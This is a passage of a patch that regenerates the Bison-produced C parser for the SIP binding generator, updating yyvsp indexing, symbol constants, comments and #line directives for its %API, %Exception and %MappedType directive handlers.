yydefault; + +- /* Not known => get a look-ahead token if don't already have one. */ ++ /* Not known => get a lookahead token if don't already have one. */ + +- /* YYCHAR is either YYEMPTY or YYEOF or a valid look-ahead symbol. */ ++ /* YYCHAR is either empty, or end-of-input, or a valid lookahead. */ + if (yychar == YYEMPTY) + { +- YYDPRINTF ((stderr, "Reading a token: ")); +- yychar = YYLEX; ++ YYDPRINTF ((stderr, "Reading a token\n")); ++ yychar = yylex (); + } + + if (yychar <= YYEOF) + { +- yychar = yytoken = YYEOF; ++ yychar = YYEOF; ++ yytoken = YYSYMBOL_YYEOF; + YYDPRINTF ((stderr, "Now at end of input.\n")); + } ++ else if (yychar == YYerror) ++ { ++ /* The scanner already issued an error message, process directly ++ to error recovery. But do not keep the error token as ++ lookahead, it is too special and may lead us to an endless ++ loop in error recovery. */ ++ yychar = YYUNDEF; ++ yytoken = YYSYMBOL_YYerror; ++ goto yyerrlab1; ++ } + else + { + yytoken = YYTRANSLATE (yychar); +@@ -2976,30 +2575,26 @@ yybackup: + yyn = yytable[yyn]; + if (yyn <= 0) + { +- if (yyn == 0 || yyn == YYTABLE_NINF) +- goto yyerrlab; ++ if (yytable_value_is_error (yyn)) ++ goto yyerrlab; + yyn = -yyn; + goto yyreduce; + } + +- if (yyn == YYFINAL) +- YYACCEPT; +- + /* Count tokens shifted since error; after three, turn off error + status. */ + if (yyerrstatus) + yyerrstatus--; + +- /* Shift the look-ahead token. */ ++ /* Shift the lookahead token. */ + YY_SYMBOL_PRINT ("Shifting", yytoken, &yylval, &yylloc); +- +- /* Discard the shifted token unless it is eof. */ +- if (yychar != YYEOF) +- yychar = YYEMPTY; +- + yystate = yyn; ++ YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN + *++yyvsp = yylval; ++ YY_IGNORE_MAYBE_UNINITIALIZED_END + ++ /* Discard the shifted token. */ ++ yychar = YYEMPTY; + goto yynewstate; + + +@@ -3014,14 +2609,14 @@ yydefault: + + + /*-----------------------------. +-| yyreduce -- Do a reduction. | ++| yyreduce -- do a reduction. | + `-----------------------------*/ + yyreduce: + /* yyn is the number of a rule to reduce with. */ + yylen = yyr2[yyn]; + + /* If YYLEN is nonzero, implement the default value of the action: +- `$$ = $1'. ++ '$$ = $1'. + + Otherwise, the following line sets YYVAL to garbage. + This behavior is undocumented and Bison +@@ -3034,9 +2629,9 @@ yyreduce: + YY_REDUCE_PRINT (yyn); + switch (yyn) + { +- case 4: +-#line 578 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 4: /* $@1: %empty */ ++#line 579 "parser.y" ++ { + /* + * We don't do these in parserEOF() because the parser is reading + * ahead and that would be too early. +@@ -3053,11 +2648,12 @@ yyreduce: + previousFile = NULL; + } + } ++#line 2652 "../parser.c" + break; + +- case 55: +-#line 648 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 55: /* nsstatement: typehdrcode */ ++#line 649 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -3065,203 +2661,224 @@ yyreduce: + if (scope == NULL) + yyerror("%TypeHeaderCode can only be used in a namespace, class or mapped type"); + +- appendCodeBlock(&scope->iff->hdrcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->iff->hdrcode, (yyvsp[0].codeb)); + } + } ++#line 2668 "../parser.c" + break; + +- case 56: +-#line 661 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 56: /* defdocstringfmt: TK_DEFDOCSTRFMT defdocstringfmt_args */ ++#line 662 "parser.y" ++ { + if (notSkipping()) +- currentModule->defdocstringfmt = convertFormat((yyvsp[(2) - (2)].defdocstringfmt).name); ++ currentModule->defdocstringfmt = convertFormat((yyvsp[0].defdocstringfmt).name); + } ++#line 2677 "../parser.c" + break; + +- case 57: +-#line 667 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 57: /* defdocstringfmt_args: TK_STRING_VALUE */ ++#line 668 "parser.y" ++ { + resetLexerState(); + +- (yyval.defdocstringfmt).name = (yyvsp[(1) - (1)].text); ++ (yyval.defdocstringfmt).name = (yyvsp[0].text); + } ++#line 2687 "../parser.c" + break; + +- case 58: +-#line 672 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defdocstringfmt) = (yyvsp[(2) - (3)].defdocstringfmt); ++ case 58: /* defdocstringfmt_args: '(' defdocstringfmt_arg_list ')' */ ++#line 673 "parser.y" ++ { ++ (yyval.defdocstringfmt) = (yyvsp[-1].defdocstringfmt); + } ++#line 2695 "../parser.c" + break; + +- case 60: +-#line 678 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defdocstringfmt) = (yyvsp[(1) - (3)].defdocstringfmt); ++ case 60: /* defdocstringfmt_arg_list: defdocstringfmt_arg_list ',' defdocstringfmt_arg */ ++#line 679 "parser.y" ++ { ++ (yyval.defdocstringfmt) = (yyvsp[-2].defdocstringfmt); + +- switch ((yyvsp[(3) - (3)].defdocstringfmt).token) ++ switch ((yyvsp[0].defdocstringfmt).token) + { +- case TK_NAME: (yyval.defdocstringfmt).name = (yyvsp[(3) - (3)].defdocstringfmt).name; break; ++ case TK_NAME: (yyval.defdocstringfmt).name = (yyvsp[0].defdocstringfmt).name; break; + } + } ++#line 2708 "../parser.c" + break; + +- case 61: +-#line 688 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 61: /* defdocstringfmt_arg: TK_NAME '=' TK_STRING_VALUE */ ++#line 689 "parser.y" ++ { + (yyval.defdocstringfmt).token = TK_NAME; + +- (yyval.defdocstringfmt).name = (yyvsp[(3) - (3)].text); ++ (yyval.defdocstringfmt).name = (yyvsp[0].text); + } ++#line 2718 "../parser.c" + break; + +- case 62: +-#line 695 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 62: /* defdocstringsig: TK_DEFDOCSTRSIG defdocstringsig_args */ ++#line 696 "parser.y" ++ { + if (notSkipping()) +- currentModule->defdocstringsig = convertSignature((yyvsp[(2) - (2)].defdocstringsig).name); ++ currentModule->defdocstringsig = convertSignature((yyvsp[0].defdocstringsig).name); + } ++#line 2727 "../parser.c" + break; + +- case 63: +-#line 701 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 63: /* defdocstringsig_args: TK_STRING_VALUE */ ++#line 702 "parser.y" ++ { + resetLexerState(); + +- (yyval.defdocstringsig).name = (yyvsp[(1) - (1)].text); ++ (yyval.defdocstringsig).name = (yyvsp[0].text); + } ++#line 2737 "../parser.c" + break; + +- case 64: +-#line 706 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defdocstringsig) = (yyvsp[(2) - (3)].defdocstringsig); ++ case 64: /* defdocstringsig_args: '(' defdocstringsig_arg_list ')' */ ++#line 707 "parser.y" ++ { ++ (yyval.defdocstringsig) = (yyvsp[-1].defdocstringsig); + } ++#line 2745 "../parser.c" + break; + +- case 66: +-#line 712 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defdocstringsig) = (yyvsp[(1) - (3)].defdocstringsig); ++ case 66: /* defdocstringsig_arg_list: defdocstringsig_arg_list ',' defdocstringsig_arg */ ++#line 713 "parser.y" ++ { ++ (yyval.defdocstringsig) = (yyvsp[-2].defdocstringsig); + +- switch ((yyvsp[(3) - (3)].defdocstringsig).token) ++ switch ((yyvsp[0].defdocstringsig).token) + { +- case TK_NAME: (yyval.defdocstringsig).name = (yyvsp[(3) - (3)].defdocstringsig).name; break; ++ case TK_NAME: (yyval.defdocstringsig).name = (yyvsp[0].defdocstringsig).name; break; + } + } ++#line 2758 "../parser.c" + break; + +- case 67: +-#line 722 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 67: /* defdocstringsig_arg: TK_NAME '=' TK_STRING_VALUE */ ++#line 723 "parser.y" ++ { + (yyval.defdocstringsig).token = TK_NAME; + +- (yyval.defdocstringsig).name = (yyvsp[(3) - (3)].text); ++ (yyval.defdocstringsig).name = (yyvsp[0].text); + } ++#line 2768 "../parser.c" + break; + +- case 68: +-#line 729 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 68: /* defencoding: TK_DEFENCODING defencoding_args */ ++#line 730 "parser.y" ++ { + if (notSkipping()) + { +- if ((currentModule->encoding = convertEncoding((yyvsp[(2) - (2)].defencoding).name)) == no_type) ++ if ((currentModule->encoding = convertEncoding((yyvsp[0].defencoding).name)) == no_type) + yyerror("The %DefaultEncoding name must be one of \"ASCII\", \"Latin-1\", \"UTF-8\" or \"None\""); + } + } ++#line 2780 "../parser.c" + break; + +- case 69: +-#line 738 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 69: /* defencoding_args: TK_STRING_VALUE */ ++#line 739 "parser.y" ++ { + resetLexerState(); + +- (yyval.defencoding).name = (yyvsp[(1) - (1)].text); ++ (yyval.defencoding).name = (yyvsp[0].text); + } ++#line 2790 "../parser.c" + break; + +- case 70: +-#line 743 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defencoding) = (yyvsp[(2) - (3)].defencoding); ++ case 70: /* defencoding_args: '(' defencoding_arg_list ')' */ ++#line 744 "parser.y" ++ { ++ (yyval.defencoding) = (yyvsp[-1].defencoding); + } ++#line 2798 "../parser.c" + break; + +- case 72: +-#line 749 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defencoding) = (yyvsp[(1) - (3)].defencoding); ++ case 72: /* defencoding_arg_list: defencoding_arg_list ',' defencoding_arg */ ++#line 750 "parser.y" ++ { ++ (yyval.defencoding) = (yyvsp[-2].defencoding); + +- switch ((yyvsp[(3) - (3)].defencoding).token) ++ switch ((yyvsp[0].defencoding).token) + { +- case TK_NAME: (yyval.defencoding).name = (yyvsp[(3) - (3)].defencoding).name; break; ++ case TK_NAME: (yyval.defencoding).name = (yyvsp[0].defencoding).name; break; + } + } ++#line 2811 "../parser.c" + break; + +- case 73: +-#line 759 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 73: /* defencoding_arg: TK_NAME '=' TK_STRING_VALUE */ ++#line 760 "parser.y" ++ { + (yyval.defencoding).token = TK_NAME; + +- (yyval.defencoding).name = (yyvsp[(3) - (3)].text); ++ (yyval.defencoding).name = (yyvsp[0].text); + } ++#line 2821 "../parser.c" + break; + +- case 74: +-#line 766 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 74: /* plugin: TK_PLUGIN plugin_args */ ++#line 767 "parser.y" ++ { + /* + * Note that %Plugin is internal in SIP v4. The current thinking + * is that it won't be needed for SIP v5. + */ + + if (notSkipping()) +- appendString(¤tSpec->plugins, (yyvsp[(2) - (2)].plugin).name); ++ appendString(¤tSpec->plugins, (yyvsp[0].plugin).name); + } ++#line 2835 "../parser.c" + break; + +- case 75: +-#line 777 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 75: /* plugin_args: TK_NAME_VALUE */ ++#line 778 "parser.y" ++ { + resetLexerState(); + +- (yyval.plugin).name = (yyvsp[(1) - (1)].text); ++ (yyval.plugin).name = (yyvsp[0].text); + } ++#line 2845 "../parser.c" + break; + +- case 76: +-#line 782 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.plugin) = (yyvsp[(2) - (3)].plugin); ++ case 76: /* plugin_args: '(' plugin_arg_list ')' */ ++#line 783 "parser.y" ++ { ++ (yyval.plugin) = (yyvsp[-1].plugin); + } ++#line 2853 "../parser.c" + break; + +- case 78: +-#line 788 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.plugin) = (yyvsp[(1) - (3)].plugin); ++ case 78: /* plugin_arg_list: plugin_arg_list ',' plugin_arg */ ++#line 789 "parser.y" ++ { ++ (yyval.plugin) = (yyvsp[-2].plugin); + +- switch ((yyvsp[(3) - (3)].plugin).token) ++ switch ((yyvsp[0].plugin).token) + { +- case TK_NAME: (yyval.plugin).name = (yyvsp[(3) - (3)].plugin).name; break; ++ case TK_NAME: (yyval.plugin).name = (yyvsp[0].plugin).name; break; + } + } ++#line 2866 "../parser.c" + break; + +- case 79: +-#line 798 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 79: /* plugin_arg: TK_NAME '=' TK_NAME_VALUE */ ++#line 799 "parser.y" ++ { + (yyval.plugin).token = TK_NAME; + +- (yyval.plugin).name = (yyvsp[(3) - (3)].text); ++ (yyval.plugin).name = (yyvsp[0].text); + } ++#line 2876 "../parser.c" + break; + +- case 80: +-#line 805 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].veh).name == NULL) ++ case 80: /* virterrorhandler: TK_VIRTERRORHANDLER veh_args codeblock */ ++#line 806 "parser.y" ++ { ++ if ((yyvsp[-1].veh).name == NULL) + yyerror("%VirtualErrorHandler must have a 'name' argument"); + + if (notSkipping()) +@@ -3270,7 +2887,7 @@ yyreduce: + + /* Check there isn't already a handler with the same name. */ + for (tailp = ¤tSpec->errorhandlers; (veh = *tailp) != NULL; tailp = &veh->next) +- if (strcmp(veh->name, (yyvsp[(2) - (3)].veh).name) == 0) ++ if (strcmp(veh->name, (yyvsp[-1].veh).name) == 0) + break; + + if (veh != NULL) +@@ -3278,8 +2895,8 @@ yyreduce: + + veh = sipMalloc(sizeof (virtErrorHandler)); + +- veh->name = (yyvsp[(2) - (3)].veh).name; +- appendCodeBlock(&veh->code, (yyvsp[(3) - (3)].codeb)); ++ veh->name = (yyvsp[-1].veh).name; ++ appendCodeBlock(&veh->code, (yyvsp[0].codeb)); + veh->mod = currentModule; + veh->index = -1; + veh->next = NULL; +@@ -3287,62 +2904,67 @@ yyreduce: + *tailp = veh; + } + } ++#line 2908 "../parser.c" + break; + +- case 81: +-#line 834 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 81: /* veh_args: TK_NAME_VALUE */ ++#line 835 "parser.y" ++ { + resetLexerState(); + +- (yyval.veh).name = (yyvsp[(1) - (1)].text); ++ (yyval.veh).name = (yyvsp[0].text); + } ++#line 2918 "../parser.c" + break; + +- case 82: +-#line 839 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.veh) = (yyvsp[(2) - (3)].veh); ++ case 82: /* veh_args: '(' veh_arg_list ')' */ ++#line 840 "parser.y" ++ { ++ (yyval.veh) = (yyvsp[-1].veh); + } ++#line 2926 "../parser.c" + break; + +- case 84: +-#line 845 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.veh) = (yyvsp[(1) - (3)].veh); ++ case 84: /* veh_arg_list: veh_arg_list ',' veh_arg */ ++#line 846 "parser.y" ++ { ++ (yyval.veh) = (yyvsp[-2].veh); + +- switch ((yyvsp[(3) - (3)].veh).token) ++ switch ((yyvsp[0].veh).token) + { +- case TK_NAME: (yyval.veh).name = (yyvsp[(3) - (3)].veh).name; break; ++ case TK_NAME: (yyval.veh).name = (yyvsp[0].veh).name; break; + } + } ++#line 2939 "../parser.c" + break; + +- case 85: +-#line 855 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 85: /* veh_arg: TK_NAME '=' TK_NAME_VALUE */ ++#line 856 "parser.y" ++ { + (yyval.veh).token = TK_NAME; + +- (yyval.veh).name = (yyvsp[(3) - (3)].text); ++ (yyval.veh).name = (yyvsp[0].text); + } ++#line 2949 "../parser.c" + break; + +- case 86: +-#line 862 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 86: /* api: TK_API api_args */ ++#line 863 "parser.y" ++ { + if (notSkipping()) + { + apiVersionRangeDef *avd; + +- if (findAPI(currentSpec, (yyvsp[(2) - (2)].api).name) != NULL) ++ if (findAPI(currentSpec, (yyvsp[0].api).name) != NULL) + yyerror("The API name in the %API directive has already been defined"); + +- if ((yyvsp[(2) - (2)].api).version < 1) ++ if ((yyvsp[0].api).version < 1) + yyerror("The version number in the %API directive must be greater than or equal to 1"); + + avd = sipMalloc(sizeof (apiVersionRangeDef)); + +- avd->api_name = cacheName(currentSpec, (yyvsp[(2) - (2)].api).name); +- avd->from = (yyvsp[(2) - (2)].api).version; ++ avd->api_name = cacheName(currentSpec, (yyvsp[0].api).name); ++ avd->from = (yyvsp[0].api).version; + avd->to = -1; + + avd->next = currentModule->api_versions; +@@ -3352,63 +2974,69 @@ yyreduce: + setIsUsedName(avd->api_name); + } + } ++#line 2978 "../parser.c" + break; + +- case 87: +-#line 888 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 87: /* api_args: TK_NAME_VALUE TK_NUMBER_VALUE */ ++#line 889 "parser.y" ++ { + resetLexerState(); + + deprecated("%API name and version number should be specified using the 'name' and 'version' arguments"); + +- (yyval.api).name = (yyvsp[(1) - (2)].text); +- (yyval.api).version = (yyvsp[(2) - (2)].number); ++ (yyval.api).name = (yyvsp[-1].text); ++ (yyval.api).version = (yyvsp[0].number); + } ++#line 2991 "../parser.c" + break; + +- case 88: +-#line 896 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.api) = (yyvsp[(2) - (3)].api); ++ case 88: /* api_args: '(' api_arg_list ')' */ ++#line 897 "parser.y" ++ { ++ (yyval.api) = (yyvsp[-1].api); + } ++#line 2999 "../parser.c" + break; + +- case 90: +-#line 902 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.api) = (yyvsp[(1) - (3)].api); ++ case 90: /* api_arg_list: api_arg_list ',' api_arg */ ++#line 903 "parser.y" ++ { ++ (yyval.api) = (yyvsp[-2].api); + +- switch ((yyvsp[(3) - (3)].api).token) ++ switch ((yyvsp[0].api).token) + { +- case TK_NAME: (yyval.api).name = (yyvsp[(3) - (3)].api).name; break; +- case TK_VERSION: (yyval.api).version = (yyvsp[(3) - (3)].api).version; break; ++ case TK_NAME: (yyval.api).name = (yyvsp[0].api).name; break; ++ case TK_VERSION: (yyval.api).version = (yyvsp[0].api).version; break; + } + } ++#line 3013 "../parser.c" + break; + +- case 91: +-#line 913 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 91: /* api_arg: TK_NAME '=' name_or_string */ ++#line 914 "parser.y" ++ { + (yyval.api).token = TK_NAME; + +- (yyval.api).name = (yyvsp[(3) - (3)].text); ++ (yyval.api).name = (yyvsp[0].text); + (yyval.api).version = 0; + } ++#line 3024 "../parser.c" + break; + +- case 92: +-#line 919 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 92: /* api_arg: TK_VERSION '=' TK_NUMBER_VALUE */ ++#line 920 "parser.y" ++ { + (yyval.api).token = TK_VERSION; + + (yyval.api).name = NULL; +- (yyval.api).version = (yyvsp[(3) - (3)].number); ++ (yyval.api).version = (yyvsp[0].number); + } ++#line 3035 "../parser.c" + break; + +- case 93: +-#line 927 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 93: /* exception: TK_EXCEPTION scopedname baseexception optflags exception_body */ ++#line 928 "parser.y" ++ { + if (notSkipping()) + { + static const char *annos[] = { +@@ -3420,20 +3048,20 @@ yyreduce: + exceptionDef *xd; + const char *pyname; + +- checkAnnos(&(yyvsp[(4) - (5)].optflags), annos); ++ checkAnnos(&(yyvsp[-1].optflags), annos); + + if (currentSpec->genc) + yyerror("%Exception not allowed in a C module"); + +- if ((yyvsp[(5) - (5)].exception).raise_code == NULL) ++ if ((yyvsp[0].exception).raise_code == NULL) + yyerror("%Exception must have a %RaiseCode sub-directive"); + +- pyname = getPythonName(currentModule, &(yyvsp[(4) - (5)].optflags), scopedNameTail((yyvsp[(2) - (5)].scpvalp))); ++ pyname = getPythonName(currentModule, &(yyvsp[-1].optflags), scopedNameTail((yyvsp[-3].scpvalp))); + + checkAttributes(currentSpec, currentModule, NULL, NULL, + pyname, FALSE); + +- xd = findException(currentSpec, (yyvsp[(2) - (5)].scpvalp), TRUE); ++ xd = findException(currentSpec, (yyvsp[-3].scpvalp), TRUE); + + if (xd->cd != NULL) + yyerror("%Exception name has already been seen as a class name - it must be defined before being used"); +@@ -3443,29 +3071,31 @@ yyreduce: + + /* Complete the definition. */ + xd->iff->module = currentModule; +- appendCodeBlock(&xd->iff->hdrcode, (yyvsp[(5) - (5)].exception).type_header_code); ++ appendCodeBlock(&xd->iff->hdrcode, (yyvsp[0].exception).type_header_code); + xd->pyname = pyname; +- xd->bibase = (yyvsp[(3) - (5)].exceptionbase).bibase; +- xd->base = (yyvsp[(3) - (5)].exceptionbase).base; +- appendCodeBlock(&xd->raisecode, (yyvsp[(5) - (5)].exception).raise_code); ++ xd->bibase = (yyvsp[-2].exceptionbase).bibase; ++ xd->base = (yyvsp[-2].exceptionbase).base; ++ appendCodeBlock(&xd->raisecode, (yyvsp[0].exception).raise_code); + +- if (getOptFlag(&(yyvsp[(4) - (5)].optflags), "Default", bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[-1].optflags), "Default", bool_flag) != NULL) + currentModule->defexception = xd; + } + } ++#line 3085 "../parser.c" + break; + +- case 94: +-#line 974 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 94: /* baseexception: %empty */ ++#line 975 "parser.y" ++ { + (yyval.exceptionbase).bibase = NULL; + (yyval.exceptionbase).base = NULL; + } ++#line 3094 "../parser.c" + break; + +- case 95: +-#line 978 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 95: /* baseexception: '(' scopedname ')' */ ++#line 979 "parser.y" ++ { + exceptionDef *xd; + + (yyval.exceptionbase).bibase = NULL; +@@ -3473,13 +3103,13 @@ yyreduce: + + /* See if it is a defined exception. */ + for (xd = currentSpec->exceptions; xd != NULL; xd = xd->next) +- if (compareScopedNames(xd->iff->fqcname, (yyvsp[(2) - (3)].scpvalp)) == 0) ++ if (compareScopedNames(xd->iff->fqcname, (yyvsp[-1].scpvalp)) == 0) + { + (yyval.exceptionbase).base = xd; + break; + } + +- if (xd == NULL && (yyvsp[(2) - (3)].scpvalp)->next == NULL && strncmp((yyvsp[(2) - (3)].scpvalp)->name, "SIP_", 4) == 0) ++ if (xd == NULL && (yyvsp[-1].scpvalp)->next == NULL && strncmp((yyvsp[-1].scpvalp)->name, "SIP_", 4) == 0) + { + /* See if it is a builtin exception. */ + +@@ -3560,7 +3190,7 @@ yyreduce: + char **cp; + + for (cp = builtins; *cp != NULL; ++cp) +- if (strcmp((yyvsp[(2) - (3)].scpvalp)->name + 4, *cp) == 0) ++ if (strcmp((yyvsp[-1].scpvalp)->name + 4, *cp) == 0) + { + (yyval.exceptionbase).bibase = *cp; + break; +@@ -3570,49 +3200,54 @@ yyreduce: + if ((yyval.exceptionbase).bibase == NULL && (yyval.exceptionbase).base == NULL) + yyerror("Unknown exception base type"); + } ++#line 3204 "../parser.c" + break; + +- case 96: +-#line 1085 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.exception) = (yyvsp[(2) - (4)].exception); ++ case 96: /* exception_body: '{' exception_body_directives '}' ';' */ ++#line 1086 "parser.y" ++ { ++ (yyval.exception) = (yyvsp[-2].exception); + } ++#line 3212 "../parser.c" + break; + +- case 98: +-#line 1091 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.exception) = (yyvsp[(1) - (2)].exception); ++ case 98: /* exception_body_directives: exception_body_directives exception_body_directive */ ++#line 1092 "parser.y" ++ { ++ (yyval.exception) = (yyvsp[-1].exception); + +- switch ((yyvsp[(2) - (2)].exception).token) ++ switch ((yyvsp[0].exception).token) + { +- case TK_RAISECODE: (yyval.exception).raise_code = (yyvsp[(2) - (2)].exception).raise_code; break; +- case TK_TYPEHEADERCODE: (yyval.exception).type_header_code = (yyvsp[(2) - (2)].exception).type_header_code; break; ++ case TK_RAISECODE: (yyval.exception).raise_code = (yyvsp[0].exception).raise_code; break; ++ case TK_TYPEHEADERCODE: (yyval.exception).type_header_code = (yyvsp[0].exception).type_header_code; break; + } + } ++#line 3226 "../parser.c" + break; + +- case 99: +-#line 1102 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 99: /* exception_body_directive: ifstart */ ++#line 1103 "parser.y" ++ { + (yyval.exception).token = TK_IF; + } ++#line 3234 "../parser.c" + break; + +- case 100: +-#line 1105 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 100: /* exception_body_directive: ifend */ ++#line 1106 "parser.y" ++ { + (yyval.exception).token = TK_END; + } ++#line 3242 "../parser.c" + break; + +- case 101: +-#line 1108 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 101: /* exception_body_directive: raisecode */ ++#line 1109 "parser.y" ++ { + if (notSkipping()) + { + (yyval.exception).token = TK_RAISECODE; +- (yyval.exception).raise_code = (yyvsp[(1) - (1)].codeb); ++ (yyval.exception).raise_code = (yyvsp[0].codeb); + } + else + { +@@ -3622,15 +3257,16 @@ yyreduce: + + (yyval.exception).type_header_code = NULL; + } ++#line 3261 "../parser.c" + break; + +- case 102: +-#line 1122 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 102: /* exception_body_directive: typehdrcode */ ++#line 1123 "parser.y" ++ { + if (notSkipping()) + { + (yyval.exception).token = TK_TYPEHEADERCODE; +- (yyval.exception).type_header_code = (yyvsp[(1) - (1)].codeb); ++ (yyval.exception).type_header_code = (yyvsp[0].codeb); + } + else + { +@@ -3640,18 +3276,20 @@ yyreduce: + + (yyval.exception).raise_code = NULL; + } ++#line 3280 "../parser.c" + break; + +- case 103: +-#line 1138 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 103: /* raisecode: TK_RAISECODE codeblock */ ++#line 1139 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 3288 "../parser.c" + break; + +- case 104: +-#line 1143 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 104: /* $@2: %empty */ ++#line 1144 "parser.y" ++ { + if (notSkipping()) + { + static const char *annos[] = { +@@ -3667,16 +3305,17 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(3) - (3)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + +- currentMappedType = newMappedType(currentSpec, &(yyvsp[(2) - (3)].memArg), &(yyvsp[(3) - (3)].optflags)); ++ currentMappedType = newMappedType(currentSpec, &(yyvsp[-1].memArg), &(yyvsp[0].optflags)); + } + } ++#line 3314 "../parser.c" + break; + +- case 106: +-#line 1166 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 106: /* $@3: %empty */ ++#line 1167 "parser.y" ++ { + if (notSkipping()) + { + static const char *annos[] = { +@@ -3694,7 +3333,7 @@ yyreduce: + mappedTypeTmplDef *mtt; + ifaceFileDef *iff; + +- checkAnnos(&(yyvsp[(4) - (4)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + + if (currentSpec->genc) + yyerror("%MappedType templates not allowed in a C module"); +@@ -3703,32 +3342,32 @@ yyreduce: + * Check the template arguments are basic types or simple + * names. + */ +- for (a = 0; a < (yyvsp[(1) - (4)].signature).nrArgs; ++a) ++ for (a = 0; a < (yyvsp[-3].signature).nrArgs; ++a) + { +- argDef *ad = &(yyvsp[(1) - (4)].signature).args[a]; ++ argDef *ad = &(yyvsp[-3].signature).args[a]; + + if (ad->atype == defined_type && ad->u.snd->next != NULL) + yyerror("%MappedType template arguments must be simple names"); + } + +- if ((yyvsp[(3) - (4)].memArg).atype != template_type) ++ if ((yyvsp[-1].memArg).atype != template_type) + yyerror("%MappedType template must map a template type"); + +- (yyvsp[(3) - (4)].memArg).u.td->fqname = fullyQualifiedName((yyvsp[(3) - (4)].memArg).u.td->fqname); ++ (yyvsp[-1].memArg).u.td->fqname = fullyQualifiedName((yyvsp[-1].memArg).u.td->fqname); + + /* Check a template hasn't already been provided. */ + for (mtt = currentSpec->mappedtypetemplates; mtt != NULL; mtt = mtt->next) +- if (compareScopedNames(mtt->mt->type.u.td->fqname, (yyvsp[(3) - (4)].memArg).u.td->fqname ) == 0 && sameTemplateSignature(&mtt->mt->type.u.td->types, &(yyvsp[(3) - (4)].memArg).u.td->types, TRUE)) ++ if (compareScopedNames(mtt->mt->type.u.td->fqname, (yyvsp[-1].memArg).u.td->fqname ) == 0 && sameTemplateSignature(&mtt->mt->type.u.td->types, &(yyvsp[-1].memArg).u.td->types, TRUE)) + yyerror("%MappedType template for this type has already been defined"); + +- (yyvsp[(3) - (4)].memArg).nrderefs = 0; +- (yyvsp[(3) - (4)].memArg).argflags = 0; ++ (yyvsp[-1].memArg).nrderefs = 0; ++ (yyvsp[-1].memArg).argflags = 0; + + mtt = sipMalloc(sizeof (mappedTypeTmplDef)); + +- mtt->sig = (yyvsp[(1) - (4)].signature); +- mtt->mt = allocMappedType(currentSpec, &(yyvsp[(3) - (4)].memArg)); +- mappedTypeAnnos(mtt->mt, &(yyvsp[(4) - (4)].optflags)); ++ mtt->sig = (yyvsp[-3].signature); ++ mtt->mt = allocMappedType(currentSpec, &(yyvsp[-1].memArg)); ++ mappedTypeAnnos(mtt->mt, &(yyvsp[0].optflags)); + mtt->next = currentSpec->mappedtypetemplates; + + currentSpec->mappedtypetemplates = mtt; +@@ -3741,11 +3380,12 @@ yyreduce: + mtt->mt->iff = iff; + } + } ++#line 3384 "../parser.c" + break; + +- case 108: +-#line 1233 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 108: /* mtdefinition: '{' mtbody '}' ';' */ ++#line 1234 "parser.y" ++ { + if (notSkipping()) + { + if (currentMappedType->convfromcode == NULL) +@@ -3757,83 +3397,90 @@ yyreduce: + currentMappedType = NULL; + } + } ++#line 3401 "../parser.c" + break; + +- case 113: +-#line 1253 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 113: /* mtline: typehdrcode */ ++#line 1254 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tMappedType->iff->hdrcode, (yyvsp[(1) - 